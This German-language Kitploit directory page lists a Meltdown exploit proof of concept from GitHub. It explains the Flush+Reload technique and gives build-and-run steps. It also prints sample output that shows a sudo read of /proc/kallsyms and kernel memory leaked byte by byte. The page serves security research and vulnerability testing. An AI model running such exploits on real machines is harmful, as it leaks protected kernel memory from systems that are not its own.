Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
meltdown-exploit — Meltdown Exploit PoC | Kitploit
Tools/GitHubGitHub/paboldin/meltdown-exploit
SpeicherforensikSchwachstellenanalyseExploitationBinary-Exploitation
GitHubpaboldin/meltdown-exploit

meltdown-exploit

Meltdown Exploit PoC

Repository anzeigen
949263vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

MELTDOWN EXPLOIT POC

Spekulative Optimierungen führen Code auf unsichere Weise aus und hinterlassen Datenspuren in der Mikroarchitektur, z. B. im Cache.

Lipp et al. 2018 veröffentlichten ihren Code am 09.01.2018 unter https://github.com/IAIK/meltdown. Details finden Sie in ihrem Paper: https://meltdownattack.com/meltdown.pdf.

Kann derzeit nur linux_proc_banner auslesen, da der zugegriffene Speicher im Cache sein muss und linux_proc_banner bei jedem Lesevorgang aus /proc/version gecached wird. Könnte mit prefetch funktionieren. Funktioniert mit sched_yield.

Erstellen mit make, ausführen mit ./run.sh.

Kann KASLR noch nicht umgehen, daher müssen Sie möglicherweise Ihr Passwort eingeben, um linux_proc_banner in /proc/kallsyms zu finden (oder manuell).

Der Ansatz von Flush+Reload und Zielarray stammt aus dem Spectre-Paper https://spectreattack.com/spectre.pdf und wurde anhand von Hinweisen aus https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/ implementiert.

Die Büchse der Pandora ist geöffnet.

Werfen Sie einen Blick auf den vollständigen Exploit, der mit der IAIK-Version auf meinem Rechner funktioniert.

Ergebnis:

root@kitploit:~
$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk 
	/linux_proc_banner/ {
		if (strtonum("0x"$1))
			print $1;
		exit 0;
	} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20  
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20  
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20  
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 158
model name	: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping	: 9
microcode	: 0x5e
cpu MHz		: 3499.316
cache size	: 6144 KB
physical id	: 0

Funktioniert auf

Die Liste der angreifbaren CPUs/Kernel wurde hierher verschoben: https://github.com/paboldin/meltdown-exploit/issues/19

Die Liste der nicht angreifbaren CPUs/Kernel wurde hierher verschoben: https://github.com/paboldin/meltdown-exploit/issues/22

Tool herunterladen